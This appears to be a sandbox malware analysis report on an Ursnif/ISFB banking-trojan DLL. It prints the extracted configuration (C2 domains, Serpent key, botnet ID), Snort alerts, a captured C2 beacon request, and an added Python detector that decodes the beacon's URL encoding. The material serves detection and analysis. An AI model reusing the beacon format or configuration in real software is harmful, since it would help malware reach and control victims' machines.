Windows Analysis Report 60e40fb428612.dll

Overview

General Information

Sample Name: 60e40fb428612.dll
Analysis ID: 444548
MD5: c6bfea479b46b9eb7a69667e0165179f
SHA1: c7f449ab51a47791a8f3041f0a0dce7c6feb06c4
SHA256: 62dbfe723197430a3af1ec9262fcd2a5c2bfc8e81b97c313101f0a5388d587fc
Tags: dll enel geo gozi isfb ita ursnif

Detection

Ursnif
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000003.317332406.0000000003560000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "ovNAU+HRorLZmwnDvbYFDY7UA+FTIAnF2uJSQd0M+N3ep6CVEhoDrEXACstP09QHK7cBl9nMAaFI1as0K4aXOQKngdScIQbDa3MQ98Ce9MYRMvxGUI05fSIRRFzMYffOXQr97vVUUUPjsYgfkDWS2eKPxSe5dz/pF0mjA0T8ibOLzHmVMs4vVv+nwVAw0xpD", "c2_domain": ["outlook.com", "auredosite.club", "vuredosite.club"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Compliance:

Uses 32bit PE files
Source: 60e40fb428612.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: 60e40fb428612.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, 00000000.00000002.476685729.000000006E234000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477751077.000000006E234000.00000002.00020000.sdmp, 60e40fb428612.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49732 -> 40.97.116.82:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49732 -> 40.97.116.82:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 37.120.222.6:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 37.120.222.6:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 40.101.18.18 40.101.18.18
Source: Joe Sandbox View IP Address: 40.97.116.82 40.97.116.82
Source: global traffic HTTP traffic detected:
GET /grower/v6VaX2L98iQ9vNPqP6I1/s7YQ5JAQQXN9djD_2BP/oxHIXx6SfkQXQHWk5gYign/kG_2FSXB9uJKM/uw7wyHm_/2Bzvrq8q92GB9q04QVkch60/s8xolTUIEl/JiLJJpnHLtn3GR9k1/2H8tNCG7sbZq/z7aUK7NADvh/BA6FMpxvpSV9V3/bnPW_2FsZW9JkMS_2Bt_2/FS0OhP_2Bi7_2Fs_/2BndfgWaKsB4v7f/IedJmZ8N1/uc.grow HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: outlook.com
Connection: Keep-Alive
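The two Snort alerts above fire on the substitution tokens (`_2B`, `_2F`) that ISFB/Ursnif uses when it rewrites the base64 alphabet of its encrypted beacon so it survives in a URL, and the captured GET request shows the rest of the structure: a random leading word (`grower`), the base64 text scattered over many path segments (a token can straddle a slash, as in `uw7wyHm_/2Bzvrq...`), and a fake filename (`uc.grow`) to the first domain in the extracted `c2_domain` list. The following Python is an added example written for this page, not Joe Sandbox code and not the Emerging Threats rule text: it re-joins the path, reverses the substitutions, recovers the ciphertext bytes and returns a heuristic verdict, also checking the Host header against the configuration's `c2_domain` list. It stops at the ciphertext; decrypting it would need Serpent with the `serpent_key` from the configuration. The `_2D` mapping for `=` comes from public ISFB analyses rather than this report, and the benign request and the 64-character threshold are constructed assumptions for the example.

```python
"""Heuristic decoder for the Ursnif/ISFB beacon URI structure seen in this report.

Added example for this page: not Joe Sandbox code and not the Emerging Threats
rule text. ISFB base64-encodes its encrypted request, rewrites the characters
that are awkward in a URL ('+' -> '_2B', '/' -> '_2F', '=' -> '_2D'; the '='
mapping is taken from public ISFB analyses, not from this report), then scatters
the text over random path segments between a leading random word and a fake
filename. A token may straddle a '/', so the path is re-joined before tokens
are reversed.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import Optional

# Request captured in the report (Host: outlook.com is the first configured c2_domain).
REPORTED_REQUEST = (
    "GET /grower/v6VaX2L98iQ9vNPqP6I1/s7YQ5JAQQXN9djD_2BP/oxHIXx6SfkQXQHWk5gYign/"
    "kG_2FSXB9uJKM/uw7wyHm_/2Bzvrq8q92GB9q04QVkch60/s8xolTUIEl/JiLJJpnHLtn3GR9k1/"
    "2H8tNCG7sbZq/z7aUK7NADvh/BA6FMpxvpSV9V3/bnPW_2FsZW9JkMS_2Bt_2/FS0OhP_2Bi7_2Fs_/"
    "2BndfgWaKsB4v7f/IedJmZ8N1/uc.grow HTTP/1.1\r\n"
    "Host: outlook.com\r\nConnection: Keep-Alive\r\n\r\n"
)
# Constructed benign request for contrast; not from the report.
BENIGN_REQUEST = "GET /static/img/logo_2B.png HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
# c2_domain list from the configuration extracted above.
CONFIG_C2_DOMAINS = {"outlook.com", "auredosite.club", "vuredosite.club"}
TOKEN_MAP = {"_2B": "+", "_2F": "/", "_2D": "="}
MIN_B64_CHARS = 64  # assumed threshold for "long base64 path"; ISFB beacons carry far more


@dataclass
class BeaconUri:
    lead_word: str                  # random directory name (here "grower")
    fake_file: str                  # fake filename with random extension (here "uc.grow")
    segments: list = field(default_factory=list)
    tokens: int = 0                 # how many _2B/_2F/_2D tokens were reversed
    b64: str = ""                   # normalised base64 text
    payload: bytes = b""            # ciphertext (Serpent, key = serpent_key in the config)


def parse_request(raw: str) -> tuple[str, str]:
    """Return (path, host) from a raw HTTP request; host is lower-cased or ''."""
    request_line, _, headers = raw.partition("\r\n")
    _method, path, _version = request_line.split(" ", 2)
    m = re.search(r"^Host:\s*(\S+)", headers, re.MULTILINE | re.IGNORECASE)
    return path, (m.group(1).lower() if m else "")


def decode_isfb_path(path: str) -> Optional[BeaconUri]:
    """Re-join the path, reverse the ISFB token substitutions and base64-decode.

    Returns None when the path lacks the word/segments/file shape or the re-joined
    text is not valid base64, so ordinary URLs fall out early.
    """
    parts = [p for p in path.split("?", 1)[0].split("/") if p]
    if len(parts) < 4 or "." not in parts[-1]:
        return None
    lead_word, *middle, fake_file = parts
    joined = "".join(middle)                      # join first: tokens straddle '/'
    tokens = sum(joined.count(t) for t in TOKEN_MAP)
    b64 = joined
    for token, char in TOKEN_MAP.items():
        b64 = b64.replace(token, char)
    if len(b64) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", b64):
        return None
    try:
        payload = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    return BeaconUri(lead_word, fake_file, middle, tokens, b64, payload)


def classify(raw: str) -> dict:
    """Heuristic verdict in the spirit of the ET 'URI Struct M1/M2' alerts above."""
    path, host = parse_request(raw)
    beacon = decode_isfb_path(path)
    if beacon is None:
        return {"suspicious": False, "reasons": ["path does not re-join into base64"], "host": host}
    reasons = []
    if beacon.tokens:
        reasons.append(f"{beacon.tokens} ISFB substitution tokens (_2B/_2F/_2D) in path")
    if len(beacon.b64) >= MIN_B64_CHARS:
        reasons.append(f"{len(beacon.b64)} base64 chars spread over {len(beacon.segments)} segments")
    if host in CONFIG_C2_DOMAINS:
        reasons.append(f"Host {host} is in the extracted c2_domain list")
    suspicious = beacon.tokens > 0 and len(beacon.b64) >= MIN_B64_CHARS
    return {"suspicious": suspicious, "reasons": reasons, "host": host, "beacon": beacon}


if __name__ == "__main__":
    for req in (REPORTED_REQUEST, BENIGN_REQUEST):
        verdict = classify(req)
        print(verdict["host"], "suspicious" if verdict["suspicious"] else "benign")
        for reason in verdict["reasons"]:
            print("  -", reason)
        if verdict["suspicious"]:
            print("  ciphertext bytes:", len(verdict["beacon"].payload))
```

Joining the segments before reversing the tokens is the detail that matters: four of the nine tokens in the captured request are split across a slash, and a segment-by-segment substitution would leave stray underscores and fail the base64 check. The verdict deliberately keys on the token count plus the length of the recovered base64 rather than on the fake extension, since the leading word and extension are random per beacon.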
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.22.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x75ae7464,0x01d7728a</date><accdate>0x75ae7464,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.22.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x75ae7464,0x01d7728a</date><accdate>0x75ae7464,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.22.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x75b61584,0x01d7728a</date><accdate>0x75b61584,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.22.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x75b61584,0x01d7728a</date><accdate>0x75b61584,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.22.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x75b61584,0x01d7728a</date><accdate>0x75b61584,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.22.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x75b61584,0x01d7728a</date><accdate>0x75b61584,0x01d7728a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: outlook.com
Source: iexplore.exe, 0000001E.00000002.478655317.000001D554DB0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: iexplore.exe, 0000001E.00000002.478655317.000001D554DB0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: iexplore.exe, 0000001E.00000002.480305506.000001D5557D6000.00000004.00000001.sdmp String found in binary or memory: http://outlook.com/grower/v6VaX2L98iQ9vNPqP6I1/s7YQ5JAQQXN9djD_2BP/oxHIXx6SfkQXQHWk5gYign/kG_2FSXB9u
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: iexplore.exe, 0000001E.00000002.479158594.000001D554EA3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
